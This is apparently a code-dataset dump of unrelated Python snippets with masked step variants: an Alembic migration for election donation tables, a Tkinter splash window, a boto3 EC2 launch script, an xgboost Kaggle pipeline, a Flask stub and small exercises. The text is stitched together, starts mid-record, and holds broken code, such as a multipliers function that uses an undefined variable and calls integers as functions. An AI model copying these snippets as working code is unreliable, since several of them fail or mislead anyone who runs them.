postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),\n sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('name', sa.Text(), nullable=False),\n sa.Column('filer_id', sa.Text(), nullable=True),\n sa.Column('sponsor', sa.Text(), nullable=True),\n sa.Column('election_id', postgresql.UUID(), nullable=True),\n sa.ForeignKeyConstraint(['election_id'], [u'election.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index('ix_committee_election_id', 'committee', ['election_id'], unique=False)\n op.create_table(u'ballot_measure',\n sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),\n sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('name', sa.Text(), nullable=True),\n sa.Column('prop_id', sa.Text(), nullable=False),\n sa.Column('description', sa.Text(), nullable=True),\n sa.Column('num_yes', sa.Integer(), nullable=True),\n sa.Column('num_no', sa.Integer(), nullable=True),\n sa.Column('passed', sa.Boolean(), nullable=True),\n sa.Column('ballot_type_id', postgresql.UUID(), nullable=True),\n sa.Column('election_id', postgresql.UUID(), nullable=True),\n sa.ForeignKeyConstraint(['ballot_type_id'], [u'ballot_type.id'], ),\n sa.ForeignKeyConstraint(['election_id'], [u'election.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index('ix_ballot_measure_election_id', 'ballot_measure', ['election_id'], unique=False)\n op.create_index('ix_ballot_measure_ballot_type_id', 'ballot_measure', ['ballot_type_id'], unique=False)\n op.create_table(u'donation',\n sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),\n sa.Column('created', sa.DateTime(timezone=True), 
server_default=func.now(), nullable=False),\n sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('amount', sa.Float(), nullable=False),\n sa.Column('transaction_date', sa.Date(), nullable=False),\n sa.Column('donor_id', postgresql.UUID(), nullable=False),\n sa.Column('committee_id', postgresql.UUID(), nullable=False),\n sa.ForeignKeyConstraint(['committee_id'], [u'committee.id'], ),\n sa.ForeignKeyConstraint(['donor_id'], [u'donor.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index('ix_donation_committee_id', 'donation', ['committee_id'], unique=False)\n op.create_index('ix_donation_donor_id', 'donation', ['donor_id'], unique=False)\n op.create_table(u'contract',\n sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),\n sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('payment', sa.Float(), nullable=False),\n sa.Column('consultant_id', postgresql.UUID(), nullable=False),\n sa.Column('service_id', postgresql.UUID(), nullable=True),\n sa.Column('description', sa.Text(), nullable=True),\n sa.Column('committee_id', postgresql.UUID(), nullable=False),\n sa.ForeignKeyConstraint(['committee_id'], [u'committee.id'], ),\n sa.ForeignKeyConstraint(['consultant_id'], [u'consultant.id'], ),\n sa.ForeignKeyConstraint(['service_id'], [u'service.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index('ix_contract_consultant_id', 'contract', ['consultant_id'], unique=False)\n op.create_index('ix_contract_service_id', 'contract', ['service_id'], unique=False)\n op.create_index('ix_contract_committee_id', 'contract', ['committee_id'], unique=False)\n op.create_table(u'stance',\n sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),\n sa.Column('created', sa.DateTime(timezone=True), 
server_default=func.now(), nullable=False),\n sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('voted_yes', sa.Boolean(), nullable=False),\n sa.Column('committee_id', postgresql.UUID(), nullable=False),\n sa.Column('ballot_measure_id', postgresql.UUID(), nullable=False),\n sa.ForeignKeyConstraint(['ballot_measure_id'], [u'ballot_measure.id'], ),\n sa.ForeignKeyConstraint(['committee_id'], [u'committee.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('committee_id','ballot_measure_id')\n )\n op.create_index('ix_stance_ballot_measure_id', 'stance', ['ballot_measure_id'], unique=False)\n op.create_index('ix_stance_committee_id', 'stance', ['committee_id'], unique=False)\n op.create_table(u'ballot_measure_tags',\n sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),\n sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('ballot_measure_id', postgresql.UUID(), nullable=False),\n sa.Column('tag_id', postgresql.UUID(), nullable=False),\n sa.ForeignKeyConstraint(['ballot_measure_id'], [u'ballot_measure.id'], ),\n sa.ForeignKeyConstraint(['tag_id'], [u'tag.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('ballot_measure_id','tag_id')\n )\n op.create_index('ix_ballot_measure_tags_tag_id', 'ballot_measure_tags', ['tag_id'], unique=False)\n op.create_index('ix_ballot_measure_tags_ballot_measure_id', 'ballot_measure_tags', ['ballot_measure_id'], unique=False)\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! 
###\n op.drop_index('ix_ballot_measure_tags_ballot_measure_id', 'ballot_measure_tags')\n op.drop_index('ix_ballot_measure_tags_tag_id', 'ballot_measure_tags')\n op.drop_table(u'ballot_measure_tags')\n op.drop_index('ix_stance_committee_id', 'stance')\n op.drop_index('ix_stance_ballot_measure_id', 'stance')\n op.drop_table(u'stance')\n op.drop_index('ix_contract_committee_id', 'contract')\n op.drop_index('ix_contract_service_id', 'contract')\n op.drop_index('ix_contract_consultant_id', 'contract')\n op.drop_table(u'contract')\n op.drop_index('ix_donation_donor_id', 'donation')\n op.drop_index('ix_donation_committee_id', 'donation')\n op.drop_table(u'donation')\n op.drop_index('ix_ballot_measure_ballot_type_id', 'ballot_measure')\n op.drop_index('ix_ballot_measure_election_id', 'ballot_measure')\n op.drop_table(u'ballot_measure')\n op.drop_index('ix_committee_election_id', 'committee')\n op.drop_table(u'committee')\n op.drop_index('ix_donor_employer_id', 'donor')\n op.drop_table(u'donor')\n op.drop_table(u'election')\n op.drop_table(u'tag')\n op.drop_table(u'employer')\n op.drop_table(u'ballot_type')\n op.drop_table(u'service')\n op.drop_table(u'consultant')\n ### end Alembic commands ###\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from Tkinter import *
import time
def create_window():
window = Toplevel(root)
w, h = root.winfo_screenwidth(), root.winfo_screenheight()
canvas = Canvas(window,width=w,height=h)
canvas.create_text(w/2,h/2,text="this will close after 3 seconds",font="Arial")
canvas.pack()
window.overrideredirect(1)
window.geometry("%dx%d+0+0" % (w, h))
window.after(3000, lambda: window.destroy())
root = Tk()
root.title("3 Second Splash")
root.geometry("250x250")
b = Button(root, text="Launch splash window", command=create_window)
b.place(relx=0.5,rely=0.5,anchor=CENTER)
#b.pack()
root.mainloop()
|
normal
|
{
"blob_id": "cac49a9a2cb753bb81c45ac1d2d887b1f48dd9bb",
"index": 9562,
"step-1": "<mask token>\n\n\ndef create_window():\n window = Toplevel(root)\n w, h = root.winfo_screenwidth(), root.winfo_screenheight()\n canvas = Canvas(window, width=w, height=h)\n canvas.create_text(w / 2, h / 2, text='this will close after 3 seconds',\n font='Arial')\n canvas.pack()\n window.overrideredirect(1)\n window.geometry('%dx%d+0+0' % (w, h))\n window.after(3000, lambda : window.destroy())\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef create_window():\n window = Toplevel(root)\n w, h = root.winfo_screenwidth(), root.winfo_screenheight()\n canvas = Canvas(window, width=w, height=h)\n canvas.create_text(w / 2, h / 2, text='this will close after 3 seconds',\n font='Arial')\n canvas.pack()\n window.overrideredirect(1)\n window.geometry('%dx%d+0+0' % (w, h))\n window.after(3000, lambda : window.destroy())\n\n\n<mask token>\nroot.title('3 Second Splash')\nroot.geometry('250x250')\n<mask token>\nb.place(relx=0.5, rely=0.5, anchor=CENTER)\nroot.mainloop()\n",
"step-3": "<mask token>\n\n\ndef create_window():\n window = Toplevel(root)\n w, h = root.winfo_screenwidth(), root.winfo_screenheight()\n canvas = Canvas(window, width=w, height=h)\n canvas.create_text(w / 2, h / 2, text='this will close after 3 seconds',\n font='Arial')\n canvas.pack()\n window.overrideredirect(1)\n window.geometry('%dx%d+0+0' % (w, h))\n window.after(3000, lambda : window.destroy())\n\n\nroot = Tk()\nroot.title('3 Second Splash')\nroot.geometry('250x250')\nb = Button(root, text='Launch splash window', command=create_window)\nb.place(relx=0.5, rely=0.5, anchor=CENTER)\nroot.mainloop()\n",
"step-4": "from Tkinter import *\nimport time\n\n\ndef create_window():\n window = Toplevel(root)\n w, h = root.winfo_screenwidth(), root.winfo_screenheight()\n canvas = Canvas(window, width=w, height=h)\n canvas.create_text(w / 2, h / 2, text='this will close after 3 seconds',\n font='Arial')\n canvas.pack()\n window.overrideredirect(1)\n window.geometry('%dx%d+0+0' % (w, h))\n window.after(3000, lambda : window.destroy())\n\n\nroot = Tk()\nroot.title('3 Second Splash')\nroot.geometry('250x250')\nb = Button(root, text='Launch splash window', command=create_window)\nb.place(relx=0.5, rely=0.5, anchor=CENTER)\nroot.mainloop()\n",
"step-5": "from Tkinter import *\nimport time\n\ndef create_window():\n window = Toplevel(root)\n w, h = root.winfo_screenwidth(), root.winfo_screenheight()\n canvas = Canvas(window,width=w,height=h)\n canvas.create_text(w/2,h/2,text=\"this will close after 3 seconds\",font=\"Arial\")\n canvas.pack()\n window.overrideredirect(1)\n window.geometry(\"%dx%d+0+0\" % (w, h))\n window.after(3000, lambda: window.destroy())\n \nroot = Tk()\nroot.title(\"3 Second Splash\")\nroot.geometry(\"250x250\")\nb = Button(root, text=\"Launch splash window\", command=create_window)\nb.place(relx=0.5,rely=0.5,anchor=CENTER)\n#b.pack()\n\nroot.mainloop()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
def func_sum_even(n):
e_digit1=n%10
n//=10
e_digit2=n%10
e_digit3=n//10
sum_even=e_digit1*(1-e_digit1%2)+e_digit2*(1-e_digit2%2)+e_digit3*(1-e_digit3%2)
return sum_even
# n=int(input())
# print(func_sum_even(n))
|
normal
|
{
"blob_id": "d567dfe29380a34534308446a9c8940cede84083",
"index": 7571,
"step-1": "<mask token>\n",
"step-2": "def func_sum_even(n):\n e_digit1 = n % 10\n n //= 10\n e_digit2 = n % 10\n e_digit3 = n // 10\n sum_even = e_digit1 * (1 - e_digit1 % 2) + e_digit2 * (1 - e_digit2 % 2\n ) + e_digit3 * (1 - e_digit3 % 2)\n return sum_even\n",
"step-3": "def func_sum_even(n):\n e_digit1=n%10\n n//=10\n e_digit2=n%10\n e_digit3=n//10\n sum_even=e_digit1*(1-e_digit1%2)+e_digit2*(1-e_digit2%2)+e_digit3*(1-e_digit3%2)\n return sum_even\n# n=int(input())\n# print(func_sum_even(n)) ",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import boto3
import json
region = 'us-east-2'
ec2 = boto3.resource('ec2',region)
ImageId = 'ami-07efac79022b86107'
KeyName = 'aws_keypair'
InstanceType = 't2.micro'
#IamInstanceProfile =
instances = ec2.create_instances(
ImageId =ImageId,
MinCount = 1,
MaxCount = 5,
KeyName = KeyName,
InstanceType = InstanceType,
IamInstanceProfile = {
'Name' : 'Test-ec2-pro',
}
)
|
normal
|
{
"blob_id": "b7606befe123c4fb6840a1bc62e43e6721edfcc3",
"index": 5005,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nregion = 'us-east-2'\nec2 = boto3.resource('ec2', region)\nImageId = 'ami-07efac79022b86107'\nKeyName = 'aws_keypair'\nInstanceType = 't2.micro'\ninstances = ec2.create_instances(ImageId=ImageId, MinCount=1, MaxCount=5,\n KeyName=KeyName, InstanceType=InstanceType, IamInstanceProfile={'Name':\n 'Test-ec2-pro'})\n",
"step-3": "import boto3\nimport json\nregion = 'us-east-2'\nec2 = boto3.resource('ec2', region)\nImageId = 'ami-07efac79022b86107'\nKeyName = 'aws_keypair'\nInstanceType = 't2.micro'\ninstances = ec2.create_instances(ImageId=ImageId, MinCount=1, MaxCount=5,\n KeyName=KeyName, InstanceType=InstanceType, IamInstanceProfile={'Name':\n 'Test-ec2-pro'})\n",
"step-4": "import boto3\nimport json\n\nregion = 'us-east-2'\n\nec2 = boto3.resource('ec2',region)\n\nImageId = 'ami-07efac79022b86107'\nKeyName = 'aws_keypair'\nInstanceType = 't2.micro'\n#IamInstanceProfile =\ninstances = ec2.create_instances(\n ImageId =ImageId,\n MinCount = 1,\n MaxCount = 5,\n KeyName = KeyName,\n InstanceType = InstanceType,\n IamInstanceProfile = {\n 'Name' : 'Test-ec2-pro',\n\n }\n)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def make_word(user_input):
word = ''
for letter in user_input:
letter = letter.lower()
if letter == 'c':
word += random.choice(consonants)
elif letter == 'v':
word += random.choice(vowels)
elif letter.isspace():
word += ' '
else:
print(
"""Incorrect character passed. You must supply either a [c]onsonant, or a [vowel]
"""
)
return word
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def make_word(user_input):
word = ''
for letter in user_input:
letter = letter.lower()
if letter == 'c':
word += random.choice(consonants)
elif letter == 'v':
word += random.choice(vowels)
elif letter.isspace():
word += ' '
else:
print(
"""Incorrect character passed. You must supply either a [c]onsonant, or a [vowel]
"""
)
return word
def main():
pattern = input(
'Enter your lexical pattern, c for consonant. v for vowel\n')
print(make_word(pattern))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
consonants = ['b', 'c', 'd', 'f', 'g', 'h', 'j', 'k', 'l', 'm', 'n', 'p',
'q', 'r', 's', 't', 'v', 'w', 'x', 'y', 'z']
vowels = ['a', 'e', ' i', 'o', 'u']
def make_word(user_input):
word = ''
for letter in user_input:
letter = letter.lower()
if letter == 'c':
word += random.choice(consonants)
elif letter == 'v':
word += random.choice(vowels)
elif letter.isspace():
word += ' '
else:
print(
"""Incorrect character passed. You must supply either a [c]onsonant, or a [vowel]
"""
)
return word
def main():
pattern = input(
'Enter your lexical pattern, c for consonant. v for vowel\n')
print(make_word(pattern))
main()
<|reserved_special_token_1|>
import random
consonants = ['b', 'c', 'd', 'f', 'g', 'h', 'j', 'k', 'l', 'm', 'n', 'p',
'q', 'r', 's', 't', 'v', 'w', 'x', 'y', 'z']
vowels = ['a', 'e', ' i', 'o', 'u']
def make_word(user_input):
word = ''
for letter in user_input:
letter = letter.lower()
if letter == 'c':
word += random.choice(consonants)
elif letter == 'v':
word += random.choice(vowels)
elif letter.isspace():
word += ' '
else:
print(
"""Incorrect character passed. You must supply either a [c]onsonant, or a [vowel]
"""
)
return word
def main():
pattern = input(
'Enter your lexical pattern, c for consonant. v for vowel\n')
print(make_word(pattern))
main()
<|reserved_special_token_1|>
import random
consonants = [
'b', 'c', 'd', 'f', 'g',
'h', 'j', 'k', 'l', 'm',
'n', 'p', 'q', 'r', 's',
't', 'v', 'w', 'x', 'y',
'z'
]
vowels = [
'a', 'e',' i', 'o', 'u'
]
def make_word(user_input):
word = ""
for letter in user_input:
letter = letter.lower()
if letter == 'c':
word += random.choice(consonants)
elif letter == 'v':
word += random.choice(vowels)
elif letter.isspace():
word += ' '
else :
print('Incorrect character passed. You must supply either a [c]onsonant, or a [vowel]\n')
return word
def main():
pattern = input('Enter your lexical pattern, c for consonant. v for vowel\n')
print(make_word(pattern))
main()
|
flexible
|
{
"blob_id": "a4f4137b9310ebc68515b9cae841051eda1f0360",
"index": 3522,
"step-1": "<mask token>\n\n\ndef make_word(user_input):\n word = ''\n for letter in user_input:\n letter = letter.lower()\n if letter == 'c':\n word += random.choice(consonants)\n elif letter == 'v':\n word += random.choice(vowels)\n elif letter.isspace():\n word += ' '\n else:\n print(\n \"\"\"Incorrect character passed. You must supply either a [c]onsonant, or a [vowel]\n\"\"\"\n )\n return word\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef make_word(user_input):\n word = ''\n for letter in user_input:\n letter = letter.lower()\n if letter == 'c':\n word += random.choice(consonants)\n elif letter == 'v':\n word += random.choice(vowels)\n elif letter.isspace():\n word += ' '\n else:\n print(\n \"\"\"Incorrect character passed. You must supply either a [c]onsonant, or a [vowel]\n\"\"\"\n )\n return word\n\n\ndef main():\n pattern = input(\n 'Enter your lexical pattern, c for consonant. v for vowel\\n')\n print(make_word(pattern))\n\n\n<mask token>\n",
"step-3": "<mask token>\nconsonants = ['b', 'c', 'd', 'f', 'g', 'h', 'j', 'k', 'l', 'm', 'n', 'p',\n 'q', 'r', 's', 't', 'v', 'w', 'x', 'y', 'z']\nvowels = ['a', 'e', ' i', 'o', 'u']\n\n\ndef make_word(user_input):\n word = ''\n for letter in user_input:\n letter = letter.lower()\n if letter == 'c':\n word += random.choice(consonants)\n elif letter == 'v':\n word += random.choice(vowels)\n elif letter.isspace():\n word += ' '\n else:\n print(\n \"\"\"Incorrect character passed. You must supply either a [c]onsonant, or a [vowel]\n\"\"\"\n )\n return word\n\n\ndef main():\n pattern = input(\n 'Enter your lexical pattern, c for consonant. v for vowel\\n')\n print(make_word(pattern))\n\n\nmain()\n",
"step-4": "import random\nconsonants = ['b', 'c', 'd', 'f', 'g', 'h', 'j', 'k', 'l', 'm', 'n', 'p',\n 'q', 'r', 's', 't', 'v', 'w', 'x', 'y', 'z']\nvowels = ['a', 'e', ' i', 'o', 'u']\n\n\ndef make_word(user_input):\n word = ''\n for letter in user_input:\n letter = letter.lower()\n if letter == 'c':\n word += random.choice(consonants)\n elif letter == 'v':\n word += random.choice(vowels)\n elif letter.isspace():\n word += ' '\n else:\n print(\n \"\"\"Incorrect character passed. You must supply either a [c]onsonant, or a [vowel]\n\"\"\"\n )\n return word\n\n\ndef main():\n pattern = input(\n 'Enter your lexical pattern, c for consonant. v for vowel\\n')\n print(make_word(pattern))\n\n\nmain()\n",
"step-5": "import random\n\n\nconsonants = [\n 'b', 'c', 'd', 'f', 'g',\n 'h', 'j', 'k', 'l', 'm',\n 'n', 'p', 'q', 'r', 's',\n 't', 'v', 'w', 'x', 'y',\n 'z'\n]\nvowels = [\n 'a', 'e',' i', 'o', 'u'\n]\n\ndef make_word(user_input):\n word = \"\"\n\n for letter in user_input:\n letter = letter.lower()\n if letter == 'c':\n word += random.choice(consonants)\n elif letter == 'v':\n word += random.choice(vowels)\n elif letter.isspace():\n word += ' '\n else :\n print('Incorrect character passed. You must supply either a [c]onsonant, or a [vowel]\\n')\n return word\n\ndef main():\n pattern = input('Enter your lexical pattern, c for consonant. v for vowel\\n')\n print(make_word(pattern))\n\nmain()\n",
"step-ids": [
1,
2,
4,
5,
6
]
}
|
[
1,
2,
4,
5,
6
] |
print(1/2 * 2) # division ret
|
normal
|
{
"blob_id": "2c1e51f2c392e77299463d95a2277b3d2ca7c299",
"index": 4336,
"step-1": "<mask token>\n",
"step-2": "print(1 / 2 * 2)\n",
"step-3": "print(1/2 * 2) # division ret\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import pandas
import evaluation
import sys
sys.path.append('D:\\libs\\xgboost\\wrapper')
import xgboost as xgb
# Read training data
folder = '../data/'
train = pandas.read_csv(folder + 'training.csv', index_col='id')
# Define features to drop from train data
# variables_to_drop = ['mass', 'production', 'min_ANNmuon', 'signal', 'SPDhits', 'IP', 'IPSig', ]
# variables_to_drop = ['mass', 'production', 'min_ANNmuon', 'signal',
# 'SPDhits', 'p0_p', 'p1_p', 'p2_p', 'p0_eta', 'p1_eta', 'p2_eta', ]
variables_to_drop = ['mass', 'production', 'min_ANNmuon', 'signal',
'SPDhits', ]
# Train xgb model on train data
train_X = train.drop(variables_to_drop, 1).values
train_y = train['signal'].values
xg_train = xgb.DMatrix(train_X, label=train_y)
# params = {'silent': 1, 'nthread': 2, 'objective': 'binary:logistic', 'eval_metric': 'auc',
# 'max_depth': 6, 'eta': 0.3}
params = {'objective': 'binary:logistic',
'eta': 0.3,
'max_depth': 5,
'min_child_weight': 3,
'silent': 1,
'subsample': 0.7,
'colsample_bytree': 0.7,
'seed': 1,
'nthread': 2}
num_trees = 250
n_rounds = 120
watchlist = [(xg_train, 'train')]
xgb_model = xgb.train(params, xg_train, num_trees, watchlist)
# xgb_model = xgb.train(params, xg_train, n_rounds, watchlist)
# Check agreement test
check_agreement = pandas.read_csv(folder + 'check_agreement.csv', index_col='id')
xg_check_agreement = xgb.DMatrix(check_agreement.values)
agreement_probs = xgb_model.predict(xg_check_agreement)
ks = evaluation.compute_ks(
agreement_probs[check_agreement['signal'].values == 0],
agreement_probs[check_agreement['signal'].values == 1],
check_agreement[check_agreement['signal'] == 0]['weight'].values,
check_agreement[check_agreement['signal'] == 1]['weight'].values)
print 'KS metric', ks, ks < 0.09
# Check correlation test
check_correlation = pandas.read_csv(folder + 'check_correlation.csv', index_col='id')
xg_check_correlation = xgb.DMatrix(check_correlation.values)
correlation_probs = xgb_model.predict(xg_check_correlation)
cvm = evaluation.compute_cvm(correlation_probs, check_correlation['mass'])
print 'CvM metric', cvm, cvm < 0.002
# Compute weighted AUC on the training data with min_ANNmuon > 0.4
train_eval = train[train['min_ANNmuon'] > 0.4]
train_eval_X = train_eval.drop(variables_to_drop, 1).values
xg_train_eval = xgb.DMatrix(train_eval_X)
train_probs = xgb_model.predict(xg_train_eval)
AUC = evaluation.roc_auc_truncated(train_eval['signal'], train_probs)
print 'AUC', AUC
# Predict test, create file for kaggle
test = pandas.read_csv(folder + 'test.csv', index_col='id')
test_X = test.values
xg_test = xgb.DMatrix(test_X)
result = pandas.DataFrame({'id': test.index})
result['prediction'] = xgb_model.predict(xg_test)
result.to_csv('../submissions/xgb.csv', index=False, sep=',')
|
normal
|
{
"blob_id": "a6365104125725f11010c35eb0781c941de803f8",
"index": 7172,
"step-1": "import pandas\nimport evaluation\nimport sys\n\nsys.path.append('D:\\\\libs\\\\xgboost\\\\wrapper')\nimport xgboost as xgb\n\n# Read training data\nfolder = '../data/'\ntrain = pandas.read_csv(folder + 'training.csv', index_col='id')\n\n# Define features to drop from train data\n# variables_to_drop = ['mass', 'production', 'min_ANNmuon', 'signal', 'SPDhits', 'IP', 'IPSig', ]\n# variables_to_drop = ['mass', 'production', 'min_ANNmuon', 'signal',\n# 'SPDhits', 'p0_p', 'p1_p', 'p2_p', 'p0_eta', 'p1_eta', 'p2_eta', ]\nvariables_to_drop = ['mass', 'production', 'min_ANNmuon', 'signal',\n 'SPDhits', ]\n\n\n# Train xgb model on train data\ntrain_X = train.drop(variables_to_drop, 1).values\ntrain_y = train['signal'].values\nxg_train = xgb.DMatrix(train_X, label=train_y)\n\n# params = {'silent': 1, 'nthread': 2, 'objective': 'binary:logistic', 'eval_metric': 'auc',\n# 'max_depth': 6, 'eta': 0.3}\n\nparams = {'objective': 'binary:logistic',\n 'eta': 0.3,\n 'max_depth': 5,\n 'min_child_weight': 3,\n 'silent': 1,\n 'subsample': 0.7,\n 'colsample_bytree': 0.7,\n 'seed': 1,\n 'nthread': 2}\nnum_trees = 250\n\nn_rounds = 120\nwatchlist = [(xg_train, 'train')]\n\nxgb_model = xgb.train(params, xg_train, num_trees, watchlist)\n# xgb_model = xgb.train(params, xg_train, n_rounds, watchlist)\n\n# Check agreement test\ncheck_agreement = pandas.read_csv(folder + 'check_agreement.csv', index_col='id')\nxg_check_agreement = xgb.DMatrix(check_agreement.values)\nagreement_probs = xgb_model.predict(xg_check_agreement)\n\nks = evaluation.compute_ks(\n agreement_probs[check_agreement['signal'].values == 0],\n agreement_probs[check_agreement['signal'].values == 1],\n check_agreement[check_agreement['signal'] == 0]['weight'].values,\n check_agreement[check_agreement['signal'] == 1]['weight'].values)\nprint 'KS metric', ks, ks < 0.09\n\n# Check correlation test\ncheck_correlation = pandas.read_csv(folder + 'check_correlation.csv', index_col='id')\nxg_check_correlation = 
xgb.DMatrix(check_correlation.values)\ncorrelation_probs = xgb_model.predict(xg_check_correlation)\ncvm = evaluation.compute_cvm(correlation_probs, check_correlation['mass'])\nprint 'CvM metric', cvm, cvm < 0.002\n\n# Compute weighted AUC on the training data with min_ANNmuon > 0.4\ntrain_eval = train[train['min_ANNmuon'] > 0.4]\ntrain_eval_X = train_eval.drop(variables_to_drop, 1).values\nxg_train_eval = xgb.DMatrix(train_eval_X)\ntrain_probs = xgb_model.predict(xg_train_eval)\nAUC = evaluation.roc_auc_truncated(train_eval['signal'], train_probs)\nprint 'AUC', AUC\n\n# Predict test, create file for kaggle\ntest = pandas.read_csv(folder + 'test.csv', index_col='id')\ntest_X = test.values\nxg_test = xgb.DMatrix(test_X)\nresult = pandas.DataFrame({'id': test.index})\n\nresult['prediction'] = xgb_model.predict(xg_test)\n\nresult.to_csv('../submissions/xgb.csv', index=False, sep=',')\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# -*- coding:utf-8 -*-
'''
@author:oldwai
'''
# email: frankandrew@163.com
def multipliers():
return lab1(x)
def lab1(x):
list1 = []
for i in range(4):
sum = x*i
list1.append(sum)
return list1
#print ([m(2) for m in multipliers()])
def func1(x):
list2 = []
for m in multipliers():
list2.append(m(x))
return list2
print(func1(3))
|
normal
|
{
"blob_id": "807e19f09f4a46b6c39457b8916714e2c54c3e8d",
"index": 5802,
"step-1": "<mask token>\n\n\ndef lab1(x):\n list1 = []\n for i in range(4):\n sum = x * i\n list1.append(sum)\n return list1\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef lab1(x):\n list1 = []\n for i in range(4):\n sum = x * i\n list1.append(sum)\n return list1\n\n\ndef func1(x):\n list2 = []\n for m in multipliers():\n list2.append(m(x))\n return list2\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef multipliers():\n return lab1(x)\n\n\ndef lab1(x):\n list1 = []\n for i in range(4):\n sum = x * i\n list1.append(sum)\n return list1\n\n\ndef func1(x):\n list2 = []\n for m in multipliers():\n list2.append(m(x))\n return list2\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef multipliers():\n return lab1(x)\n\n\ndef lab1(x):\n list1 = []\n for i in range(4):\n sum = x * i\n list1.append(sum)\n return list1\n\n\ndef func1(x):\n list2 = []\n for m in multipliers():\n list2.append(m(x))\n return list2\n\n\nprint(func1(3))\n",
"step-5": "# -*- coding:utf-8 -*-\r\n'''\r\n@author:oldwai\r\n'''\r\n# email: frankandrew@163.com\r\n\r\n\r\ndef multipliers():\r\n return lab1(x)\r\n\r\n\r\ndef lab1(x):\r\n list1 = []\r\n for i in range(4):\r\n sum = x*i\r\n list1.append(sum)\r\n return list1\r\n\r\n#print ([m(2) for m in multipliers()])\r\ndef func1(x):\r\n list2 = []\r\n for m in multipliers():\r\n list2.append(m(x))\r\n return list2\r\n\r\nprint(func1(3))",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
@app.route('/')
def hello_world():
return 'Hello Waeweorld!'
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if not os.path.exists(dbDir):
db.create_all()
@app.route('/')
def hello_world():
return 'Hello Waeweorld!'
if __name__ == '__main__':
app.run()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
dbDir = os.path.dirname(__file__)
dbDir = '%s%sappConfig%smine.db' % (dbDir, os.sep, os.sep)
if not os.path.exists(dbDir):
db.create_all()
@app.route('/')
def hello_world():
return 'Hello Waeweorld!'
if __name__ == '__main__':
app.run()
<|reserved_special_token_1|>
from appConfig.App import app, db
import os
dbDir = os.path.dirname(__file__)
dbDir = '%s%sappConfig%smine.db' % (dbDir, os.sep, os.sep)
if not os.path.exists(dbDir):
db.create_all()
@app.route('/')
def hello_world():
return 'Hello Waeweorld!'
if __name__ == '__main__':
app.run()
<|reserved_special_token_1|>
from appConfig.App import app, db
import os
dbDir = os.path.dirname(__file__)
# staticFolder = '%sstatic' % os.sep
dbDir = '%s%sappConfig%smine.db' % (dbDir, os.sep, os.sep)
if not os.path.exists(dbDir):
# 创建数据库并创建表
db.create_all()
# app._static_folder = staticFolder
@app.route('/')
def hello_world():
return 'Hello Waeweorld!'
if __name__ == '__main__':
app.run()
|
flexible
|
{
"blob_id": "71cee06ce697030fd0cea363ddecaa411b39544d",
"index": 4330,
"step-1": "<mask token>\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello Waeweorld!'\n\n\n<mask token>\n",
"step-2": "<mask token>\nif not os.path.exists(dbDir):\n db.create_all()\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello Waeweorld!'\n\n\nif __name__ == '__main__':\n app.run()\n",
"step-3": "<mask token>\ndbDir = os.path.dirname(__file__)\ndbDir = '%s%sappConfig%smine.db' % (dbDir, os.sep, os.sep)\nif not os.path.exists(dbDir):\n db.create_all()\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello Waeweorld!'\n\n\nif __name__ == '__main__':\n app.run()\n",
"step-4": "from appConfig.App import app, db\nimport os\ndbDir = os.path.dirname(__file__)\ndbDir = '%s%sappConfig%smine.db' % (dbDir, os.sep, os.sep)\nif not os.path.exists(dbDir):\n db.create_all()\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello Waeweorld!'\n\n\nif __name__ == '__main__':\n app.run()\n",
